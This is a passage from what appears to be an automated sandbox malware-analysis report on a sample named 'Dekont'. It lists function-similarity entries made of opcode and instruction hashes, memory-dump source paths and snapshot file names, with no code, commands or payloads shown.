                                  • Opcode Fuzzy Hash: bc6f15056dc6824a9c078ab507cf09eef4c1de6fbc420033a4adb3bc42671b8c
                                  • Instruction Fuzzy Hash: AF2105B1E00249ABCB60DFAAD981AAEFBF8FF98700F10412EE445E7254DA749941CF50
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                  • Instruction ID: 2582eb743e093f45121a204ac46dae35ee6ecf061b7595547dc2253041c9788c
                                  • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                  • Instruction Fuzzy Hash: 28215E72A00209EFDF129F98CC44BAEBBFDEF88310F204456F955A7251D774D9519B50
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                  • Instruction ID: 6aeb092ab7054a6817916485b6c74f68875a3f1a0a13e638ff7f900abdf7f1f6
                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                  • Instruction Fuzzy Hash: AA11EF72641605AFF7239B48CC41FEABBB9EB80794F104069F6448B1C0D671EE44DB60
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9812ebcb3af0ef958e9fc1fb1a9f0f1b26c6afb333eec30a5dbbd42a87a198b0
                                  • Instruction ID: 49315ca1b39977d022fc786b5e89c562dfcde6aeb9689f328c37c5e14024ef8e
                                  • Opcode Fuzzy Hash: 9812ebcb3af0ef958e9fc1fb1a9f0f1b26c6afb333eec30a5dbbd42a87a198b0
                                  • Instruction Fuzzy Hash: 09119835B016119BCB11CF4AC5C0A5AB7EBAF46BA072C406FED099F305DAB2DD02D790
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                  • Instruction ID: 585eaa0f033d7f37d357b5b65d884d0c4d8234aa709541aef32e848b739310cc
                                  • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                  • Instruction Fuzzy Hash: 13217972A00B40DFE7228F5DC544B6ABBE6EB84B50F1489BDE58A97652C734ED01DB80
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 06b1c05e26ec7da9d4139fbd8cbd0f2935e3ad2d15c649c2e20f91b2f8fae0af
                                  • Instruction ID: 17ba30e74dddca29c2cd9d22d3af69145d91407bacdaad9fc6c40a9359e25f1a
                                  • Opcode Fuzzy Hash: 06b1c05e26ec7da9d4139fbd8cbd0f2935e3ad2d15c649c2e20f91b2f8fae0af
                                  • Instruction Fuzzy Hash: 6F215E76A00205DFCB14CF58C581B6EBBB6FB88758F24416ED105A7350CB71AD0BDB90
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a61bfff1d76b8d800a03c2d1d965e0b874d1cf6749351b70bc2922e9c11c339a
                                  • Instruction ID: fc76d22685e8a33d4ca9a89b27c1582a520dd3be3ea635d43cf7d020f0751eee
                                  • Opcode Fuzzy Hash: a61bfff1d76b8d800a03c2d1d965e0b874d1cf6749351b70bc2922e9c11c339a
                                  • Instruction Fuzzy Hash: F5219D71600A00EFE7618F69C881F6AB7F9FF84750F04882DE5DEC7291DA31A960CB61
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14364f871f5c49e2f9ce75104115f679216012918a6bebeddae03e4926556676
                                  • Instruction ID: cfb5ea8792f6d8729b41cda8c721df1e3fa76bd947dc0e9eb898e156d2ac7b79
                                  • Opcode Fuzzy Hash: 14364f871f5c49e2f9ce75104115f679216012918a6bebeddae03e4926556676
                                  • Instruction Fuzzy Hash: 291129336001145BCB29DB29CC45A7F725BEFD1770B244529E6228B3A0E931C811C691
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3aa0949e95894d183702e6aea197a40c34245cd54ebf5eaf9fa2eb61b5087f69
                                  • Instruction ID: c090c7e2017de83ea71c231e1e90528c4875cdd8648cb57d6f5e1d52d482a84b
                                  • Opcode Fuzzy Hash: 3aa0949e95894d183702e6aea197a40c34245cd54ebf5eaf9fa2eb61b5087f69
                                  • Instruction Fuzzy Hash: CF11C132240604EFC722DB6DCD40F9A77ACEF99B50F114068F681DB261DA76E901CBA0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fea71589d230174bcf6568f924f1d29a0f145c9a4132f06f65e395d2833910c7
                                  • Instruction ID: e4959332d339a9c2abb0610940ebf47ffff497bd6c7e97ccafaa19e6858dfc98
                                  • Opcode Fuzzy Hash: fea71589d230174bcf6568f924f1d29a0f145c9a4132f06f65e395d2833910c7
                                  • Instruction Fuzzy Hash: 01110172A00240DFEB76CF5DC980A0ABBEABF84300F0140B9E9899B351F635DD00DB90
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 958b5bfe2eae7ef6ab0cad9fa6a7b0a32bc28307d59d5972e2bac8912f8f2f36
                                  • Instruction ID: 8d1ee419e05d9d24c9b18a64d6ea0ffb710214a7456b9070d3ac602a10f53a9e
                                  • Opcode Fuzzy Hash: 958b5bfe2eae7ef6ab0cad9fa6a7b0a32bc28307d59d5972e2bac8912f8f2f36
                                  • Instruction Fuzzy Hash: DA01F271641700AFD3315F1AD901F1BBEA8FF44F50F11446EB2868F3A0D6B598409B68
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                  • Instruction ID: 145785d3771c97c4364dac03e22b468fff19228e6943359bbf1b0674c058b500
                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                  • Instruction Fuzzy Hash: 32F01D7220001DBFEF019F94DD81DAF7BBEEF59398B104125FA11A2160D636DE21ABA0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0419c4ba73b5bc60232ed9ed765995de7dd2b570083adedbf6285377294efcca
                                  • Instruction ID: cab64052de40fc49853f1b3acfe6c31c550423586058edbe90858668969da5f6
                                  • Opcode Fuzzy Hash: 0419c4ba73b5bc60232ed9ed765995de7dd2b570083adedbf6285377294efcca
                                  • Instruction Fuzzy Hash: D001783A200109EBCF129F84D840EDA3FA6FB4C654F058201FE5866220C736D960EF81
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 003b916c6a15372784122c9a7d5f4692b5c9220f384d5c059335b51ecc11ac07
                                  • Instruction ID: 5b99714241e568733716f6159df8c89466a31c5e00e7c3fc9dc1d53f446608f3
                                  • Opcode Fuzzy Hash: 003b916c6a15372784122c9a7d5f4692b5c9220f384d5c059335b51ecc11ac07
                                  • Instruction Fuzzy Hash: 23F09672B543025FE754A6169D02F623296D7D1761F2D806EEA098B292E971DC01A2D4
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7b9fc2349312f830e295d3c8bfe18ce83c38f7e0f13265335f80a2c17f1b820b
                                  • Instruction ID: f5d4172a08a735c5e363f5f17028a848053b40bf630d7f518d74b1412769647e
                                  • Opcode Fuzzy Hash: 7b9fc2349312f830e295d3c8bfe18ce83c38f7e0f13265335f80a2c17f1b820b
                                  • Instruction Fuzzy Hash: F801A4B03007C59FF3739B2CCD88B2937E5AB40B05F4841E0BA81DB6D6EB2ED4018610
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                  • Instruction ID: 44e9e860371dd77264a97a632c364ca0dcff5d1ee62166b7ac9b6c3bbf9757c9
                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                  • Instruction Fuzzy Hash: D0F02535B41D5347E7B5762D8460B3E75D55F90E10B05857C56C9D75C0DF20DC00C794
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction ID: abc5bb651a2ee2bc24f785e680e487b528962cab3f0e429a1315c2ab69e046e4
                                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction Fuzzy Hash: 1CF054327155519BD3A19A4DDC80F27F7E8EFC5A60F6900B5AA899B660C760ED0187D0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 89d8b8f58a0e2b43f764b4b01630fe64de62bab0b4a902745b30e25877125201
                                  • Instruction ID: 1b4f2245183eca76d871186cac3453556c34472d3acce74ff061f44d0dd05cf9
                                  • Opcode Fuzzy Hash: 89d8b8f58a0e2b43f764b4b01630fe64de62bab0b4a902745b30e25877125201
                                  • Instruction Fuzzy Hash: 78F0A4706053489FD350EF28C946A1BB7E8FF98710F40465ABCD4DB394E638E900C756
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction ID: f47f0044fb446f41bb6094f4fb4c78a210e2522f8e39fce05be4baaf7323cf8a
                                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction Fuzzy Hash: 1FF02472600200AFF315DB21CC05F56B6E9FF99340F148078A584C71A4FAB0DE01D754
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e2804fb6505c7edb91138f3c38aaa34e43980f03c20daa7fec3a0658de173ea
                                  • Instruction ID: d0da192d05cb2a32a7429305db8d2675c0b44fb330d0cdf8d7517656f34b5a3f
                                  • Opcode Fuzzy Hash: 9e2804fb6505c7edb91138f3c38aaa34e43980f03c20daa7fec3a0658de173ea
                                  • Instruction Fuzzy Hash: D2F090366002446FE7A17B1DEC48B5BFBDAFB95720F49445AFDC52722287396C80DEA0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 993ebd9207c613fc1de48fd9da57b197410ba501a040025762843adafbbcab81
                                  • Instruction ID: 5adc30d841c3782179b956eebc50d708c0562515d0c77aa7b62d155e69c2af27
                                  • Opcode Fuzzy Hash: 993ebd9207c613fc1de48fd9da57b197410ba501a040025762843adafbbcab81
                                  • Instruction Fuzzy Hash: 94F06270A0124DDFDB54EF69C615A9EB7F8FF58300F008055B995EB395DA38EA01CB50
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e54dd80e5ab0047191ab33ed69d8f3323291e3f7e053d2ed49decb4586658ae
                                  • Instruction ID: 3be844a27eab5897e619503831d0e38c6c773ce855ae13e1c25e5cc24ac0209f
                                  • Opcode Fuzzy Hash: 3e54dd80e5ab0047191ab33ed69d8f3323291e3f7e053d2ed49decb4586658ae
                                  • Instruction Fuzzy Hash: 16F06732D166E09FD722AA688448B62B796AB11BB0F1D896BD499C7602C774EC80F650
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ce9bbeb31cd154fea679f7d2b218d9a95ae6e9bdffce844ce99cd8390e3c0bfc
                                  • Instruction ID: 9dbb44457818b8b1be06b03c0e03735ab83630b03621c3693d2acc61df11b286
                                  • Opcode Fuzzy Hash: ce9bbeb31cd154fea679f7d2b218d9a95ae6e9bdffce844ce99cd8390e3c0bfc
                                  • Instruction Fuzzy Hash: 21F027B64196850ACFB26B3CA4702D13FACE741510F0910C9E4E09730ACA7B8483DB20
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e1a95d2424d9cfc0987182857d296d221008a46831338cca530d2aa5888c1066
                                  • Instruction ID: 88859855ef5962d95f1bdd9f0ac86a547d9f4ea4fad07f3f3a0d04c51fb1036a
                                  • Opcode Fuzzy Hash: e1a95d2424d9cfc0987182857d296d221008a46831338cca530d2aa5888c1066
                                  • Instruction Fuzzy Hash: 25F02E714026809BF3B3869CCA08B517BE8AB097A0F0C96E1D982C3182C260E880CA40
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                  • Instruction ID: 27bb5e9a13652fd0248ef7aed1acd1429c30293e5591a53bcf8b4c3faae00f3d
                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                  • Instruction Fuzzy Hash: 73E0C032300A002BE3129F09CCC0F4377AEDFC6B10F00047DB5005F282C9EACC0882A0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                  • Instruction ID: 506b130dab5be763796f69abdcf470ce2470c4e266f444e5e49175cb9639361f
                                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                  • Instruction Fuzzy Hash: D0F01C72104604AFF3218F0AD944B57BBFCEB05764F558065F6499B561D37AEC40CBA4
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                  • Instruction ID: 385e1077b4b7f09f758b95391cf79fcaacd7975c2fac2def22ff9044c91325ff
                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                  • Instruction Fuzzy Hash: 8AF0E53A2043549BDB16EF19D440BD57BE5EB51350F140095F8968F351EB31F982DB90
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                  • Instruction ID: 0b5a344681071f6dbaac19b95808ab5d967454a1186fe71d3c8685d360d1b0da
                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                  • Instruction Fuzzy Hash: EFE0D832244585ABE7232A59CC00B6A77E5DBD27A0F150429E780CB1D0DB74DCC0D7DC
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                  • Instruction ID: fa2fe1c4db95f8c400afddbdec4081001c1edf71bdfad864fcfd6534cb2322ae
                                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                  • Instruction Fuzzy Hash: 89E0DF32A00510BBEB22A7998D02F9ABEADEB90FA0F050055B601E70D0E531DE04D6A0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56c62ff1eda09e1bdf6d44cc4d7fdc403d6bb65d3d6684610e16e318f6b2dfdd
                                  • Instruction ID: df5b5b946206354c393f7c52451566b8d0a2d0d04488327835fce837b35bb8f7
                                  • Opcode Fuzzy Hash: 56c62ff1eda09e1bdf6d44cc4d7fdc403d6bb65d3d6684610e16e318f6b2dfdd
                                  • Instruction Fuzzy Hash: 6FD0C25AB8A05195861A9A1D6CA08A1E72984C3670B1023E8DC98DB781D311C02182B9
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b047f4f83e1eb87b1a84b0e5bf8f21a506deba256640338e45d7b02ffb6432eb
                                  • Instruction ID: af01d30f6e15b0ccff43a5ebeba85ca83c13e8628aa6ad4e9aa29b579accbf6f
                                  • Opcode Fuzzy Hash: b047f4f83e1eb87b1a84b0e5bf8f21a506deba256640338e45d7b02ffb6432eb
                                  • Instruction Fuzzy Hash: 46E022320006809BC321FB2ADC02F8B77AAEF60360F100115B05557291CB38A800C7C4
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                  • Instruction ID: 0b79e146be5866bf22df54b0fa21daf4645f2822d7d8e62cd6da074a07056b70
                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                  • Instruction Fuzzy Hash: 1EE0C9343003058FE795CF19C044B937BF6BFD5610F28D0A8A9888F205EB32E882CB40
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fadf0930fe88bdae2d9b33950088507e3f5344aac545660a2bd45cbbd8b45db9
                                  • Instruction ID: d7d695ddf5286298b2d85ede9317357e7ae6301349b9737993ed19936e6506c8
                                  • Opcode Fuzzy Hash: fadf0930fe88bdae2d9b33950088507e3f5344aac545660a2bd45cbbd8b45db9
                                  • Instruction Fuzzy Hash: E8D02B324814606EFB77E219BD04FE73A999B41724F0548E0F148D20A2D51CCCC196D4
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                  • Instruction ID: 2b48a029d15a345ea1f7bafcd4069f394b57cf7b821576de2127df4e9057ecaf
                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                  • Instruction Fuzzy Hash: 8CE08632400521DED7312E15DD09FD176A1FB94B50F30486DE081160688A759C82FA44
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                  • Instruction ID: 91bfe4f6df0fda7b29510e60d324e00f0fe7b5edb3831a7bbb3a54d466ec3c2f
                                  • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                  • Instruction Fuzzy Hash: C5E08631401621DED731AF16EE05F9276A1BB50760F20446DE046164A08A749C86E655
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d91d9e487480c871e9eedc6c5b9435b345d18009c725df8d22f0474d68c27857
                                  • Instruction ID: 0d51edd9d1a73e48ddb2bb3ff5229c8347bbad0369c3c3555ada72661d5b0004
                                  • Opcode Fuzzy Hash: d91d9e487480c871e9eedc6c5b9435b345d18009c725df8d22f0474d68c27857
                                  • Instruction Fuzzy Hash: 82E08C321005906BC221FB5EED12E5A739AEFA4360F140222B15197295CA29ED00D794
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                  • Instruction ID: bfc5b102971535bf7abbb948c74ce918e7642f8600471cebc8d45c115098e7ba
                                  • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                  • Instruction Fuzzy Hash: F6E08633511A1487D729DE18D511B7677E4FF45720F09863EA653477C1C634E544C794
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
